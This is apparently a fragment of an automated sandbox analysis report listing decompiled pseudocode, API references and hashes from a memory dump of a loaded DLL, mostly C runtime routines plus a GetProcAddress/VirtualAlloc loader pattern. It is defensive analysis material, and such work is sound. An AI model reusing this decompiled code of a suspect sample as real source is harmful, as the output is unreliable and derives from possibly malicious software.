            0x6d503e39
            0x00000000
            0x6d503e39
            0x6d503de3
            0x6d503de9
            0x6d503deb
            0x6d503deb
            0x6d503df1
            0x6d503df1
            0x6d503df6
            0x00000000
            0x6d503df6
            0x6d503da9
            0x6d503dac
            0x6d503daf
            0x6d503dba
            0x6d503dbc
            0x6d503dbd
            0x6d503dc8
            0x6d503dcc
            0x00000000
            0x6d503dcc
            0x6d503d87
            0x00000000
            0x6d503d87
            0x6d503d12
            0x6d503d18
            0x6d503d21
            0x6d503d34
            0x6d503d3a
            0x6d503cf5
            0x6d503cf6
            0x6d503cf6
            0x6d503cf0
            0x00000000
            0x6d503cf0
            0x6d50399b
            0x6d503a3d
            0x6d503a52
            0x6d503a5b
            0x6d503a74
            0x6d503a78
            0x6d503a80
            0x6d503a97
            0x6d503a9b
            0x6d503aa1
            0x6d503ac0
            0x6d503ac6
            0x6d503ad6
            0x6d503ada
            0x6d503b16
            0x6d503b1b
            0x6d503b1c
            0x6d503b25
            0x6d503b26
            0x6d503b2a
            0x6d503b38
            0x6d503b40
            0x6d503b45
            0x6d503b48
            0x6d503b49
            0x6d503b4a
            0x6d503b53
            0x6d503b54
            0x6d503b5d
            0x6d503b5e
            0x6d503b5f
            0x6d503b63
            0x6d503b64
            0x6d503b65
            0x6d503b74
            0x6d503b76
            0x6d503b7d
            0x6d503b80
            0x6d503b90
            0x6d503ba2
            0x6d503baa
            0x6d503bb9
            0x6d503bc3
            0x6d503bcb
            0x00000000
            0x00000000
            0x6d503bd9
            0x6d503be1
            0x6d503be5
            0x6d503be6
            0x6d503be9
            0x6d503bed
            0x6d503bf1
            0x6d503bf5
            0x6d503bf8
            0x6d503bfc
            0x6d503bfc
            0x6d503c01
            0x6d503c05
            0x6d503c09
            0x00000000
            0x6d503c09
            0x6d5039a1
            0x6d5039b8
            0x6d5039d0
            0x6d5039d5
            0x6d5039f7
            0x6d503a0c
            0x6d503a0f
            0x6d503a15
            0x6d503a1c
            0x6d503a2d
            0x00000000

            APIs
            • GetProcAddress.KERNEL32(?,?), ref: 6D5039B2
            • GetProcAddress.KERNEL32(?,?), ref: 6D503C34
            • VirtualAlloc.KERNEL32(00000000,?,?,00000004), ref: 6D503C97
            • ExitProcess.KERNEL32 ref: 6D503CF6
            • VirtualAlloc.KERNEL32(00000000,?,00001000,?), ref: 6D503D69
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: AddressAllocProcVirtual$ExitProcess
            • String ID:
            • API String ID: 1983990664-0
            • Opcode ID: 307eadefd17e9349b8114a89b150a9f697d0e3337c30afdeac24833376fb991a
            • Instruction ID: 99beb09c118127cbcd2e6f875356200a09a4072c3b0b140a7ec0144e764ece1f
            • Opcode Fuzzy Hash: 307eadefd17e9349b8114a89b150a9f697d0e3337c30afdeac24833376fb991a
            • Instruction Fuzzy Hash: F152CB716042018FDB48CF28C5D5A96BBE5FF89304F1985BAED49CF29ADB30E941CB61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50BCDC Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
            Download Yara Rule
            C-Code - Quality: 77%
            			E6D50BCDC(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x6d55ce08; // 0xc2f81198
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E6D508929(_t41);
					_pop(_t62);
				}
				E6D509250(_t67,  &_v804, 0, 0x50);
				E6D509250(_t67,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x5
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -807
				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E6D508929(_t57);
				}
				return E6D508B95(_v8 ^ _t70);
			}





































            0x6d50bcdc
            0x6d50bcdc
            0x6d50bcdc
            0x6d50bcdc
            0x6d50bce7
            0x6d50bcec
            0x6d50bcee
            0x6d50bcf6
            0x6d50bcf8
            0x6d50bcfb
            0x6d50bd00
            0x6d50bd00
            0x6d50bd0c
            0x6d50bd1f
            0x6d50bd2d
            0x6d50bd33
            0x6d50bd39
            0x6d50bd3f
            0x6d50bd45
            0x6d50bd4b
            0x6d50bd51
            0x6d50bd57
            0x6d50bd5d
            0x6d50bd63
            0x6d50bd6a
            0x6d50bd71
            0x6d50bd78
            0x6d50bd7f
            0x6d50bd86
            0x6d50bd8d
            0x6d50bd8e
            0x6d50bd97
            0x6d50bd9d
            0x6d50bd9d
            0x6d50bda0
            0x6d50bda6
            0x6d50bdb3
            0x6d50bdbc
            0x6d50bdc5
            0x6d50bdce
            0x6d50bddc
            0x6d50bdde
            0x6d50bde4
            0x6d50bdf3
            0x6d50bdff
            0x6d50be02
            0x6d50be07
            0x6d50be16

            APIs
            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6D50BDD4
            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6D50BDDE
            • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 6D50BDEB
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled$DebuggerPresent
            • String ID:
            • API String ID: 3906539128-0
            • Opcode ID: 965130dae223a04ec7a3ecb38c0cb98d87020a786054902126db917e36cd9199
            • Instruction ID: bc284f373ce23fed982c1d9ac57edec90f97d1dbdb3f8cba797632ff3950ed01
            • Opcode Fuzzy Hash: 965130dae223a04ec7a3ecb38c0cb98d87020a786054902126db917e36cd9199
            • Instruction Fuzzy Hash: 3931D3759112199BCF25EF64DC88B9CBBB8BF48310F5045DAE51CA7250E7309F818F85
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50A626 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
            Download Yara Rule
            C-Code - Quality: 100%
            			E6D50A626(int _a4) {
				void* _t14;
				void* _t16;

				if(E6D50CE0F(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E6D50A6AB(_t14, _t16, _a4);
				ExitProcess(_a4);
			}





            0x6d50a632
            0x6d50a64e
            0x6d50a64e
            0x6d50a657
            0x6d50a660

            APIs
            • GetCurrentProcess.KERNEL32(?,?,6D50A5FC,?,6D53E678,0000000C,6D50A72F,00000000,00000000,00000001,6D508275,6D53E5F8,0000000C,6D50811E,?), ref: 6D50A647
            • TerminateProcess.KERNEL32(00000000,?,6D50A5FC,?,6D53E678,0000000C,6D50A72F,00000000,00000000,00000001,6D508275,6D53E5F8,0000000C,6D50811E,?), ref: 6D50A64E
            • ExitProcess.KERNEL32 ref: 6D50A660
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: Process$CurrentExitTerminate
            • String ID:
            • API String ID: 1703294689-0
            • Opcode ID: 6eca7a861294104e20214979dd1c950202edb2f8e3715d95a4e31eeeba00271a
            • Instruction ID: ed85ab5965deb13364bfb0efb7466747ce2a19c02a79f1a0e628b34b3d334c63
            • Opcode Fuzzy Hash: 6eca7a861294104e20214979dd1c950202edb2f8e3715d95a4e31eeeba00271a
            • Instruction Fuzzy Hash: 4AE08C31800149AFCF05AF60CD0DF583B3AFF96286F120414FA388AA21DB39DD82CB80
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50D074 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
            Download Yara Rule
            C-Code - Quality: 72%
            			E6D50D074(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E6D50B523(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E6D5102BB(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E6D50D2B3(_a16, _t101, __eflags, _t111);
							E6D50B3FE(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E6D5102BB(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E6D50BEB6();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x6d55ce08; // 0xc2f81198
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E6D510310(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E6D509250(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E6D50D074(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E6D50FE70(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E6D50CECC);
									}
								} else {
									_push(_t55);
									_t57 = E6D50D074(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E6D50D074(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E6D508B95(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}















































            0x6d50d079
            0x6d50d07a
            0x6d50d07d
            0x6d50d07d
            0x6d50d080
            0x6d50d080
            0x6d50d082
            0x6d50d083
            0x6d50d08c
            0x6d50d08d
            0x6d50d090
            0x6d50d093
            0x6d50d098
            0x6d50d09f
            0x6d50d0a0
            0x6d50d0a1
            0x6d50d0a4
            0x6d50d0ae
            0x6d50d0b1
            0x6d50d0b2
            0x6d50d0b4
            0x6d50d0c8
            0x6d50d0c8
            0x6d50d0cb
            0x6d50d0d5
            0x6d50d0da
            0x6d50d0dd
            0x6d50d0df
            0x00000000
            0x6d50d0e1
            0x6d50d0e5
            0x6d50d0ee
            0x6d50d0f4
            0x00000000
            0x6d50d0f7
            0x6d50d0b6
            0x6d50d0b6
            0x6d50d0bc
            0x6d50d0c1
            0x6d50d0c4
            0x6d50d0c6
            0x6d50d0fd
            0x6d50d0ff
            0x6d50d100
            0x6d50d101
            0x6d50d102
            0x6d50d103
            0x6d50d104
            0x6d50d109
            0x6d50d10d
            0x6d50d10f
            0x6d50d115
            0x6d50d11c
            0x6d50d11f
            0x6d50d122
            0x6d50d123
            0x6d50d126
            0x6d50d127
            0x6d50d12a
            0x6d50d12b
            0x6d50d14c
            0x6d50d14c
            0x6d50d14e
            0x00000000
            0x00000000
            0x6d50d133
            0x6d50d135
            0x6d50d137
            0x6d50d139
            0x6d50d13b
            0x6d50d13d
            0x6d50d13f
            0x6d50d14a
            0x00000000
            0x6d50d14a
            0x6d50d13f
            0x6d50d13b
            0x00000000
            0x6d50d137
            0x6d50d150
            0x6d50d152
            0x6d50d155
            0x6d50d16e
            0x6d50d16e
            0x6d50d170
            0x6d50d173
            0x6d50d183
            0x6d50d185
            0x6d50d185
            0x6d50d175
            0x6d50d175
            0x6d50d178
            0x00000000
            0x6d50d17a
            0x6d50d17a
            0x6d50d17d
            0x00000000
            0x6d50d17f
            0x6d50d17f
            0x6d50d17f
            0x6d50d17d
            0x6d50d178
            0x6d50d18b
            0x6d50d193
            0x6d50d197
            0x6d50d1a5
            0x6d50d1aa
            0x6d50d1bf
            0x6d50d1c1
            0x6d50d1c7
            0x6d50d1ca
            0x6d50d1fc
            0x6d50d1fc
            0x6d50d1fe
            0x6d50d201
            0x6d50d207
            0x6d50d207
            0x6d50d20e
            0x6d50d228
            0x6d50d228
            0x6d50d237
            0x6d50d23c
            0x6d50d23f
            0x6d50d241
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x6d50d210
            0x6d50d210
            0x6d50d216
            0x6d50d218
            0x00000000
            0x6d50d21a
            0x6d50d21a
            0x6d50d21d
            0x00000000
            0x6d50d21f
            0x6d50d21f
            0x6d50d226
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x6d50d226
            0x6d50d21d
            0x6d50d218
            0x00000000
            0x6d50d243
            0x6d50d24b
            0x6d50d251
            0x6d50d253
            0x6d50d253
            0x6d50d25b
            0x6d50d260
            0x6d50d268
            0x6d50d26b
            0x6d50d26d
            0x6d50d281
            0x6d50d286
            0x6d50d1cc
            0x6d50d1cc
            0x6d50d1d0
            0x6d50d1d8
            0x6d50d1d8
            0x6d50d1d8
            0x6d50d1da
            0x6d50d1dd
            0x6d50d1e0
            0x6d50d1e0
            0x6d50d157
            0x6d50d15a
            0x6d50d15c
            0x00000000
            0x6d50d15e
            0x6d50d15e
            0x6d50d164
            0x6d50d169
            0x6d50d15c
            0x6d50d1ed
            0x6d50d1f8
            0x00000000
            0x00000000
            0x00000000
            0x6d50d0c6
            0x6d50d09a
            0x6d50d09c
            0x6d50d0f8
            0x6d50d0fc
            0x6d50d0fc
            0x00000000

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID: .
            • API String ID: 0-248832578
            • Opcode ID: fe7bb02aea30fd3068c5640ecc91d67cc2059b3c6f24a3adab482221b4cdbd10
            • Instruction ID: 414a392c0203ff1785561229da23dc31599e0806761fd2670da8d3f83d54cd48
            • Opcode Fuzzy Hash: fe7bb02aea30fd3068c5640ecc91d67cc2059b3c6f24a3adab482221b4cdbd10
            • Instruction Fuzzy Hash: D7310A7190420AAFCB18CE78CC94EFBBBBDDFC6314F154599E918D7A41EA309E458B50
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D5116E2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODECrypto
            Download Yara Rule
            C-Code - Quality: 100%
            			E6D5116E2(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E6D511B3E(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E6D511AA4(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























            0x6d5116f0
            0x6d5116f7
            0x6d5116fc
            0x6d511702
            0x6d511705
            0x6d51170b
            0x6d511710
            0x6d511715
            0x6d511715
            0x6d51171b
            0x6d511720
            0x6d511725
            0x6d511725
            0x6d51172c
            0x6d511731
            0x6d511736
            0x6d511736
            0x6d51173d
            0x6d511742
            0x6d511747
            0x6d511747
            0x6d51174e
            0x6d511753
            0x6d511758
            0x6d511758
            0x6d511760
            0x6d511770
            0x6d511782
            0x6d511794
            0x6d5117a7
            0x6d5117b9
            0x6d5117c1
            0x6d5117c6
            0x6d5117cb
            0x6d5117cb
            0x6d5117d2
            0x6d5117d7
            0x6d5117d7
            0x6d5117de
            0x6d5117e3
            0x6d5117e3
            0x6d5117ea
            0x6d5117ef
            0x6d5117ef
            0x6d5117f6
            0x6d5117fb
